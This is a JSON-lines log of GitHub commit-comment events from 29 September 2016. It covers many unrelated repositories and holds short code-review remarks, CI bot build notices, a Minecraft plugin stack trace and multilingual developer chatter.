{"id":"4638612000","type":"CommitCommentEvent","actor":{"login":"jeannunes"},"repo":{"name":"modafocabr/Processo-de-Vendas"},"payload":{"comment":{"id":19227539,"position":null,"line":null,"path":null,"commit_id":"acbc53a1a95c15ffbc1976e82208d8ddc1ce36e0","created_at":"2016-09-29T17:06:53Z","updated_at":"2016-09-29T17:06:53Z","body":"que grande bosta"}},"created_at":"2016-09-29T17:06:53Z"}
{"id":"4638618242","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19227558,"position":null,"line":null,"path":null,"commit_id":"d453f01b196f30e5587ecc51943459049ca2bbe9","created_at":"2016-09-29T17:08:09Z","updated_at":"2016-09-29T17:08:09Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 283](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1270&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-29T17:08:09Z"}
{"id":"4638626639","type":"CommitCommentEvent","actor":{"login":"kmonson"},"repo":{"name":"zbeech/volttron"},"payload":{"comment":{"id":19227581,"position":null,"line":null,"path":null,"commit_id":"176034fff6eb40081e8b22e7874311576b06c9d5","created_at":"2016-09-29T17:09:41Z","updated_at":"2016-09-29T17:09:41Z","body":"Has this made it into develop yet?"}},"created_at":"2016-09-29T17:09:41Z"}
{"id":"4638635765","type":"CommitCommentEvent","actor":{"login":"VolkovGerman"},"repo":{"name":"nikitapavets/RepairWatcher"},"payload":{"comment":{"id":19227602,"position":null,"line":null,"path":null,"commit_id":"ef8345d91a442c6efa18830c03a7140af8744a19","created_at":"2016-09-29T17:11:26Z","updated_at":"2016-09-29T17:11:26Z","body":"That directory structure is much better! Awesome!"}},"created_at":"2016-09-29T17:11:26Z"}
{"id":"4638638994","type":"CommitCommentEvent","actor":{"login":"PleaseDontKillMe"},"repo":{"name":"cerbin1/CalculatorGame"},"payload":{"comment":{"id":19227609,"position":null,"line":null,"path":null,"commit_id":"c65eb52493f362fdb441a58676e97d62eca31c18","created_at":"2016-09-29T17:12:01Z","updated_at":"2016-09-29T17:12:01Z","body":"Niezły commit"}},"created_at":"2016-09-29T17:12:01Z"}
{"id":"4638639061","type":"CommitCommentEvent","actor":{"login":"irvin"},"repo":{"name":"moztw/www.moztw.org"},"payload":{"comment":{"id":19227610,"position":null,"line":null,"path":null,"commit_id":"1a7e4dbe3cf1d4bb9d10e506ea49ae1b7acda1d0","created_at":"2016-09-29T17:12:02Z","updated_at":"2016-09-29T17:12:02Z","body":"@Sea-n 改成這樣了"}},"created_at":"2016-09-29T17:12:02Z"}
{"id":"4638643175","type":"CommitCommentEvent","actor":{"login":"PRASANNARAGAV"},"repo":{"name":"PRASANNARAGAV/imad-2016-app"},"payload":{"comment":{"id":19227623,"position":null,"line":null,"path":null,"commit_id":"2967bea79ab64f8debb580d962aadd130d2c1705","created_at":"2016-09-29T17:12:49Z","updated_at":"2016-09-29T17:12:49Z","body":"Replaced to original."}},"created_at":"2016-09-29T17:12:49Z"}
{"id":"4638644203","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19227626,"position":null,"line":null,"path":null,"commit_id":"3cd44791ade50f66091868ad6c55e1a746732361","created_at":"2016-09-29T17:13:01Z","updated_at":"2016-09-29T17:13:01Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/new-relic](https://peterpanth-static-docs.pantheonsite.io/docs/new-relic)\n"}},"created_at":"2016-09-29T17:13:01Z"}
{"id":"4638645952","type":"CommitCommentEvent","actor":{"login":"helptiger"},"repo":{"name":"FabioZumbi12/FakeMobs"},"payload":{"comment":{"id":19227634,"position":null,"line":null,"path":null,"commit_id":"359ff9fb2c6fede96144bd801e59dd7ff477078b","created_at":"2016-09-29T17:13:21Z","updated_at":"2016-09-29T17:13:21Z","body":"Shop is not working on 1.10.2; tested with wg 6.1.2 and latest builds\r\n[19:07:00 ERROR]: Could not pass event InventoryOpenEvent to WorldGuard v6.1.3-SNAPSHOT;1685-9cafb07\r\norg.bukkit.event.EventException\r\n\tat org.bukkit.plugin.java.JavaPluginLoader$1.execute(JavaPluginLoader.java:310) ~[spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.RegisteredListener.callEvent(RegisteredListener.java:62) ~[spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.SimplePluginManager.fireEvent(SimplePluginManager.java:502) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.SimplePluginManager.callEvent(SimplePluginManager.java:487) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.craftbukkit.v1_10_R1.event.CraftEventFactory.callInventoryOpenEvent(CraftEventFactory.java:750) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.craftbukkit.v1_10_R1.event.CraftEventFactory.callInventoryOpenEvent(CraftEventFactory.java:736) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat net.minecraft.server.v1_10_R1.EntityPlayer.openTrade(EntityPlayer.java:744) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat sun.reflect.GeneratedMethodAccessor78.invoke(Unknown Source) ~[?:?]\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_45]\r\n\tat java.lang.reflect.Method.invoke(Method.java:497) ~[?:1.8.0_45]\r\n\tat de.howaner.FakeMobs.merchant.NMSMerchant.openTrading(NMSMerchant.java:95) [FakeMobs-1.10.jar:?]\r\n\tat de.howaner.FakeMobs.merchant.Merchant.openTrading(Merchant.java:67) [FakeMobs-1.10.jar:?]\r\n\tat de.howaner.FakeMobs.util.MobShop.openShop(MobShop.java:21) [FakeMobs-1.10.jar:?]\r\n\tat de.howaner.FakeMobs.listener.MobListener.onSelectMob(MobListener.java:97) [FakeMobs-1.10.jar:?]\r\n\tat sun.reflect.GeneratedMethodAccessor76.invoke(Unknown Source) ~[?:?]\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_45]\r\n\tat java.lang.reflect.Method.invoke(Method.java:497) ~[?:1.8.0_45]\r\n\tat org.bukkit.plugin.java.JavaPluginLoader$1.execute(JavaPluginLoader.java:306) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.RegisteredListener.callEvent(RegisteredListener.java:62) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.SimplePluginManager.fireEvent(SimplePluginManager.java:502) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.plugin.SimplePluginManager.callEvent(SimplePluginManager.java:487) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat de.howaner.FakeMobs.listener.ProtocolListener$1.run(ProtocolListener.java:79) [FakeMobs-1.10.jar:?]\r\n\tat org.bukkit.craftbukkit.v1_10_R1.scheduler.CraftTask.run(CraftTask.java:71) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.craftbukkit.v1_10_R1.scheduler.CraftScheduler.mainThreadHeartbeat(CraftScheduler.java:350) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat net.minecraft.server.v1_10_R1.MinecraftServer.D(MinecraftServer.java:723) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat net.minecraft.server.v1_10_R1.DedicatedServer.D(DedicatedServer.java:400) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat net.minecraft.server.v1_10_R1.MinecraftServer.C(MinecraftServer.java:668) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat net.minecraft.server.v1_10_R1.MinecraftServer.run(MinecraftServer.java:567) [spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat java.lang.Thread.run(Thread.java:745) [?:1.8.0_45]\r\nCaused by: java.lang.ClassCastException: com.sun.proxy.$Proxy37 cannot be cast to net.minecraft.server.v1_10_R1.EntityVillager\r\n\tat net.minecraft.server.v1_10_R1.InventoryMerchant.getOwner(InventoryMerchant.java:45) ~[spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat org.bukkit.craftbukkit.v1_10_R1.inventory.CraftInventory.getHolder(CraftInventory.java:471) ~[spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\tat com.sk89q.worldguard.bukkit.listener.EventAbstractionListener.onInventoryOpen(EventAbstractionListener.java:774) ~[?:?]\r\n\tat sun.reflect.GeneratedMethodAccessor68.invoke(Unknown Source) ~[?:?]\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:1.8.0_45]\r\n\tat java.lang.reflect.Method.invoke(Method.java:497) ~[?:1.8.0_45]\r\n\tat org.bukkit.plugin.java.JavaPluginLoader$1.execute(JavaPluginLoader.java:306) ~[spigot-1.10.2.jar:git-Spigot-e0e1771-5e5cf84]\r\n\t... 28 more"}},"created_at":"2016-09-29T17:13:21Z"}
{"id":"4638649349","type":"CommitCommentEvent","actor":{"login":"aschnell"},"repo":{"name":"shundhammer/libstorage"},"payload":{"comment":{"id":19227640,"position":null,"line":null,"path":null,"commit_id":"e3348d80065a56cc10ddb31830205b44537e40c1","created_at":"2016-09-29T17:14:00Z","updated_at":"2016-09-29T17:14:00Z","body":"LGTM"}},"created_at":"2016-09-29T17:14:00Z"}
{"id":"4638652251","type":"CommitCommentEvent","actor":{"login":"therewasaguy"},"repo":{"name":"processing/p5.js"},"payload":{"comment":{"id":19227648,"position":null,"line":null,"path":null,"commit_id":"e4b4e4acdf10eef86d40211b12c1e5a637602b43","created_at":"2016-09-29T17:14:31Z","updated_at":"2016-09-29T17:14:31Z","body":"- add p5.Distortion effect\r\n- add p5.AudioIn error handler for ios and safari\r\n- fix p5.SoundFile playbackRate in Chrome 53+\r\n- fix `DynamicsCompressor.ratio.value` clamping warning\r\n- fix for p5.Noise constructor ignores argument\r\n- fix p5.SoundFile whileLoading callback\r\n- fix for Oscillator dispose method & general improvements to oscillator memory management\r\n- fix WAV format in soundRecorder saveSound() \r\n- fix p5.AudioIn stop error due to mediastream api changes\r\n- fix p5.Part timing\r\n- fix p5.Part removePhrase\r\n- fix a bug when passing a parameter to the disconnect method\r\n- updates to documentation / inline examples for p5js.org"}},"created_at":"2016-09-29T17:14:31Z"}
{"id":"4638652920","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19227651,"position":49,"line":96,"path":"src/Control/TimeWarp/Rpc/MonadRpc.hs","commit_id":"1c47f95fdc54a0b502add713459b5baba3ac93a0","created_at":"2016-09-29T17:14:40Z","updated_at":"2016-09-29T17:14:40Z","body":"You can use `hiding` in re-exports (if I understand you correctly)."}},"created_at":"2016-09-29T17:14:40Z"}
{"id":"4638654553","type":"CommitCommentEvent","actor":{"login":"bradvogel"},"repo":{"name":"wapisasa/batchelor"},"payload":{"comment":{"id":19227654,"position":null,"line":null,"path":null,"commit_id":"b142df5a5151a5afbe4a6a8a38e9b101fbf8e2b1","created_at":"2016-09-29T17:14:58Z","updated_at":"2016-09-29T17:14:58Z","body":"It's just a readme update, so probably not necessary."}},"created_at":"2016-09-29T17:14:58Z"}
{"id":"4638654765","type":"CommitCommentEvent","actor":{"login":"mirichmo"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":19227655,"position":5,"line":1025,"path":"test/powershell/Modules/Microsoft.PowerShell.Security/ExecutionPolicy.Tests.ps1","commit_id":"c758b2e7d3e39d2728b0f4aef702a7b2a660b685","created_at":"2016-09-29T17:15:00Z","updated_at":"2016-09-29T17:15:00Z","body":"This is still a \"happens to\" scenario. I'd like to see it be explicit and separated into two tests since both are expected behaviors.\r\nTest 1:\r\nCurrentUser ExecutionPolicy is set to Undefined and LocalMachine Execution Policy is set to Bypass.\r\nThe expected result is no exception and the behavior of the original test.\r\nTest 2:\r\nCurrentUser ExecutionPolicy is set to Restricted and LocalMachine ExecutionPolicy is set to Bypass.\r\nThe expected result is the exception thrown here that you have coded."}},"created_at":"2016-09-29T17:15:00Z"}
{"id":"4638655033","type":"CommitCommentEvent","actor":{"login":"Jusonex"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19227657,"position":null,"line":null,"path":null,"commit_id":"6b0ed3582a2f92e7b96e74425d84af4a90ac4426","created_at":"2016-09-29T17:15:03Z","updated_at":"2016-09-29T17:15:03Z","body":"@ccw808 Is this okay? http://do-not.press/klaxon.mp4"}},"created_at":"2016-09-29T17:15:03Z"}
{"id":"4638657458","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19227667,"position":41,"line":0,"path":"libraries/build-docs.xml","commit_id":"12c443106c75a2e821c3978f2969edaef5c5a70c","created_at":"2016-09-29T17:15:29Z","updated_at":"2016-09-29T17:15:29Z","body":"Opened a feature request for dokka: #KT-14121"}},"created_at":"2016-09-29T17:15:29Z"}
{"id":"4638660227","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19227670,"position":null,"line":null,"path":null,"commit_id":"db2663613cfee0f2440cf71c8a12e89ef50cc6ab","created_at":"2016-09-29T17:16:00Z","updated_at":"2016-09-29T17:16:00Z","body":"As far as I remeber, stack owner can resurrect hsi own stack even if he doesn't control it. It was exploited in one walkthrough."}},"created_at":"2016-09-29T17:16:00Z"}
{"id":"4638661390","type":"CommitCommentEvent","actor":{"login":"juliangruber"},"repo":{"name":"juliangruber/dat-desktop"},"payload":{"comment":{"id":19227674,"position":null,"line":null,"path":null,"commit_id":"fe7c250881bc99cc47bf716bd14e6cd1467b9f82","created_at":"2016-09-29T17:16:13Z","updated_at":"2016-09-29T17:16:13Z","body":":)"}},"created_at":"2016-09-29T17:16:13Z"}
{"id":"4638661901","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19227676,"position":49,"line":96,"path":"src/Control/TimeWarp/Rpc/MonadRpc.hs","commit_id":"1c47f95fdc54a0b502add713459b5baba3ac93a0","created_at":"2016-09-29T17:16:19Z","updated_at":"2016-09-29T17:16:19Z","body":"Really, somehow i forgot"}},"created_at":"2016-09-29T17:16:19Z"}
{"id":"4638678739","type":"CommitCommentEvent","actor":{"login":"jashkenas"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":19227714,"position":null,"line":null,"path":null,"commit_id":"46841d916d218f23afeaedcad538b63f1ec3d397","created_at":"2016-09-29T17:19:27Z","updated_at":"2016-09-29T17:19:27Z","body":"Just curiosity — is this a regression or has the bug always been there?"}},"created_at":"2016-09-29T17:19:27Z"}
{"id":"4638681679","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19227720,"position":30,"line":30,"path":"build/index.html","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-29T17:20:00Z","updated_at":"2016-09-29T17:20:00Z","body":"2) так он должен меняться модификатором класса как раз)"}},"created_at":"2016-09-29T17:20:00Z"}
{"id":"4638684681","type":"CommitCommentEvent","actor":{"login":"maciejgrzybek"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19227729,"position":9,"line":240,"path":"presto-main/src/test/java/com/facebook/presto/type/TestDecimalCasts.java","commit_id":"2d96f6f7415532ccf2dd3186a5cdd51e6318cf81","created_at":"2016-09-29T17:20:32Z","updated_at":"2016-09-29T17:20:32Z","body":"Why this is not, similarly to below lines, changed as well?"}},"created_at":"2016-09-29T17:20:32Z"}
{"id":"4638686891","type":"CommitCommentEvent","actor":{"login":"ttsvetko"},"repo":{"name":"angular/material"},"payload":{"comment":{"id":19227735,"position":7,"line":7,"path":"src/core/services/layout/ie_fixes.css","commit_id":"eaf0fe5193d862120eee673de0861632d076d4a7","created_at":"2016-09-29T17:20:56Z","updated_at":"2016-09-29T17:20:56Z","body":"What is the idea behind having same media query rule twice and same css rule declaration within it? "}},"created_at":"2016-09-29T17:20:56Z"}
{"id":"4638687352","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19227736,"position":null,"line":null,"path":null,"commit_id":"748169dce2afb90e850551b4a2e26cbb79ef342e","created_at":"2016-09-29T17:21:02Z","updated_at":"2016-09-29T17:21:02Z","body":"For ceylon/ceylon-ide-intellij#512."}},"created_at":"2016-09-29T17:21:02Z"}
{"id":"4638694344","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19227756,"position":null,"line":null,"path":null,"commit_id":"24ae3021ee2a749a200d79cae2b83fbf8eda2a33","created_at":"2016-09-29T17:22:22Z","updated_at":"2016-09-29T17:22:22Z","body":"wow!! amaing!"}},"created_at":"2016-09-29T17:22:22Z"}
{"id":"4638694357","type":"CommitCommentEvent","actor":{"login":"eumanito"},"repo":{"name":"mjsorribas/hotelbeds-simple-api"},"payload":{"comment":{"id":19227757,"position":null,"line":null,"path":null,"commit_id":"be5a62cb40978070a239361623c037f75dac5368","created_at":"2016-09-29T17:22:22Z","updated_at":"2016-09-29T17:22:22Z","body":"Hola Maximiliano,\r\n¿Cómo puedo actualizar esta base de datos tiene alguna función para actualizar?"}},"created_at":"2016-09-29T17:22:22Z"}
{"id":"4638703779","type":"CommitCommentEvent","actor":{"login":"redninja2"},"repo":{"name":"BrennanKunkel/crafty"},"payload":{"comment":{"id":19227779,"position":null,"line":null,"path":null,"commit_id":"f74aaf08eab20805b71a3b1c087a102fd21933a6","created_at":"2016-09-29T17:24:09Z","updated_at":"2016-09-29T17:24:09Z","body":"The commit message didn't get sent properly. \r\nI formatted the css file and added comments to make it more organized. \r\nI created separate sections in the css file for page structural elements (body, certain divs, etc...), the header and footer elements, and a section for page content styles (p's, h1-h6's, address, etc...)."}},"created_at":"2016-09-29T17:24:09Z"}
{"id":"4638707466","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"jashkenas/coffeescript"},"payload":{"comment":{"id":19227795,"position":null,"line":null,"path":null,"commit_id":"46841d916d218f23afeaedcad538b63f1ec3d397","created_at":"2016-09-29T17:24:49Z","updated_at":"2016-09-29T17:24:49Z","body":"Regression since #4220."}},"created_at":"2016-09-29T17:24:49Z"}
{"id":"4638712502","type":"CommitCommentEvent","actor":{"login":"tgroh"},"repo":{"name":"apache/incubator-beam"},"payload":{"comment":{"id":19227813,"position":5,"line":29,"path":"sdks/java/core/src/main/java/org/apache/beam/sdk/util/state/TimerCallback.java","commit_id":"218b6d1423c7e08e7543c905f9ff13b0933018cd","created_at":"2016-09-29T17:25:45Z","updated_at":"2016-09-29T17:25:45Z","body":"This isn't quite what I was expecting.\r\n\r\nCan we enumerate the cases in which `TimerCallback.NO_OP` is used? It would be useful to ensure that we're not discarding any timers (and letting data get stuck as a result)"}},"created_at":"2016-09-29T17:25:45Z"}
{"id":"4638716205","type":"CommitCommentEvent","actor":{"login":"Tasanar"},"repo":{"name":"ServUO/ServUO"},"payload":{"comment":{"id":19227821,"position":null,"line":null,"path":null,"commit_id":"255f58c2109edf1e069ee588696233eedc9e783d","created_at":"2016-09-29T17:26:26Z","updated_at":"2016-09-29T17:26:26Z","body":"Should be all quivers."}},"created_at":"2016-09-29T17:26:26Z"}
{"id":"4638716267","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19227823,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-29T17:26:27Z","updated_at":"2016-09-29T17:26:27Z","body":"Этот фикс не работает, фото делается не в hdr, а в auto. Лучше вернуть как было"}},"created_at":"2016-09-29T17:26:27Z"}
{"id":"4638716897","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19227824,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T17:26:34Z","updated_at":"2016-09-29T17:26:34Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1791 of 1794 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.26%25-green.svg)</a>\n"}},"created_at":"2016-09-29T17:26:34Z"}
{"id":"4638717574","type":"CommitCommentEvent","actor":{"login":"SnapperRy"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19227828,"position":null,"line":null,"path":null,"commit_id":"927d00299847eeeebd17b4518e33046bb77ef3d7","created_at":"2016-09-29T17:26:41Z","updated_at":"2016-09-29T17:26:41Z","body":"Thanks for catching that. Not sure how I missed that, I recall checking sniffs too."}},"created_at":"2016-09-29T17:26:41Z"}
{"id":"4638719516","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dev.github.io"},"payload":{"comment":{"id":19227832,"position":6,"line":208,"path":"index.html","commit_id":"068ec7e8c6e740ad76b1454aa166d216e15e3bdd","created_at":"2016-09-29T17:27:03Z","updated_at":"2016-09-29T17:27:03Z","body":"@jetwhiz I had to do this long time ago !"}},"created_at":"2016-09-29T17:27:03Z"}
{"id":"4638722127","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19227838,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T17:27:31Z","updated_at":"2016-09-29T17:27:31Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-29T17:27:31Z"}
{"id":"4638728971","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":19227853,"position":null,"line":null,"path":null,"commit_id":"7d9dcf489741461712838c5c3eddc9b56dd34d27","created_at":"2016-09-29T17:28:42Z","updated_at":"2016-09-29T17:28:42Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-29T17:28:42Z"}
{"id":"4638730281","type":"CommitCommentEvent","actor":{"login":"charlesfrantz"},"repo":{"name":"gus/gocql"},"payload":{"comment":{"id":19227858,"position":8,"line":8,"path":"address_translators.go","commit_id":"8b4a22a50a6a5e04240a23048bf34cf9fe08cba9","created_at":"2016-09-29T17:28:57Z","updated_at":"2016-09-29T17:28:57Z","body":"s/a one/one"}},"created_at":"2016-09-29T17:28:57Z"}
{"id":"4638739214","type":"CommitCommentEvent","actor":{"login":"drtakhs"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19227869,"position":null,"line":null,"path":null,"commit_id":"dfdae75fea380b7d6f7c446b7fff7c05c83eab6f","created_at":"2016-09-29T17:30:32Z","updated_at":"2016-09-29T17:30:32Z","body":"hmm, sorry for stupid question. but s2 areas before that maplib.py change do not contain any errors right? I hope yes since i finally just finished scanning the whole thing (after i created some more workers and setting the parts at suggested+1 since 3out of 6 lvl10 cells were nearly empy and it was spending more time over there)"}},"created_at":"2016-09-29T17:30:32Z"}
{"id":"4638739812","type":"CommitCommentEvent","actor":{"login":"bricelam"},"repo":{"name":"aspnet/EntityFramework6"},"payload":{"comment":{"id":19227870,"position":7,"line":87,"path":"src/EntityFramework/Core/Mapping/FunctionImportMappingComposableHelper.cs","commit_id":"b4cb2b17ac24a611719b18cb3c890b59d076a290","created_at":"2016-09-29T17:30:38Z","updated_at":"2016-09-29T17:30:38Z","body":"Please [submit a new issue](https://github.com/aspnet/EntityFramework6/issues/new). Commenting on two-year old commits is an ineffective way to communicate with the team."}},"created_at":"2016-09-29T17:30:38Z"}
{"id":"4638740194","type":"CommitCommentEvent","actor":{"login":"JReyLBC"},"repo":{"name":"robscodebase/azo"},"payload":{"comment":{"id":19227871,"position":null,"line":null,"path":null,"commit_id":"66460644e6464245955f55e27b964ba8e5feab4a","created_at":"2016-09-29T17:30:43Z","updated_at":"2016-09-29T17:30:43Z","body":"You have a binary file in this commit. You should never commit binary files to version control because that's not what version control systems (VCS) are designed for.\r\n\r\nTo illustrate that, what would a diff between two binary files mean? Nothing. \r\nWhat would it mean to branch from changes in one binary file? Nothing.\r\nWhat would it mean to merge binary files from a different branch together? Nothing.\r\n\r\nTherefore, it would add no value to have binary files in version control. They just bloat the repository.\r\n\r\nCreate a .gitignore file in the root of your project directory, and add the filenames (or globs) of files you want to exclude from the repository. Git will use this file to know what it should ignore, and it will ignore those files."}},"created_at":"2016-09-29T17:30:43Z"}
{"id":"4638745720","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19227879,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-29T17:31:45Z","updated_at":"2016-09-29T17:31:45Z","body":"Oh, that was almost 5 months ago. Anyway APP_ROOT still works. It just populates CORE_SOURCE_DIR."}},"created_at":"2016-09-29T17:31:45Z"}
{"id":"4638751265","type":"CommitCommentEvent","actor":{"login":"Argalep"},"repo":{"name":"ServUO/ServUO"},"payload":{"comment":{"id":19227898,"position":null,"line":null,"path":null,"commit_id":"255f58c2109edf1e069ee588696233eedc9e783d","created_at":"2016-09-29T17:32:46Z","updated_at":"2016-09-29T17:32:46Z","body":"![screenhunter_131 sep 29 20 31](https://cloud.githubusercontent.com/assets/17765272/18964951/c7e55a38-8683-11e6-9f6c-822922c754f2.png)\r\n\r\nIn general, artifacts and other named items cannot be altered"}},"created_at":"2016-09-29T17:32:46Z"}
{"id":"4638752088","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19227904,"position":null,"line":null,"path":null,"commit_id":"77ffdd7a8ad10b1791c859954ccd5af1a8c1626c","created_at":"2016-09-29T17:32:55Z","updated_at":"2016-09-29T17:32:55Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GJVtvtJIQu23sIZ2dk_tnA"}},"created_at":"2016-09-29T17:32:55Z"}
{"id":"4638752653","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19227905,"position":55,"line":55,"path":"spec/requests/api/providers/dispatchers/create_spec.rb","commit_id":"eb3533099dd1142cd310b7988e9469e990efd34c","created_at":"2016-09-29T17:33:02Z","updated_at":"2016-09-29T17:33:02Z","body":"expect(provider_dispatcher.provider_office).to eq(provider_office)"}},"created_at":"2016-09-29T17:33:02Z"}
{"id":"4638753274","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19227907,"position":null,"line":null,"path":null,"commit_id":"867642cb857b1a5621eda15b9aead827580734fc","created_at":"2016-09-29T17:33:09Z","updated_at":"2016-09-29T17:33:09Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cD_JW6xPQBqGvByL6F0gTw"}},"created_at":"2016-09-29T17:33:09Z"}
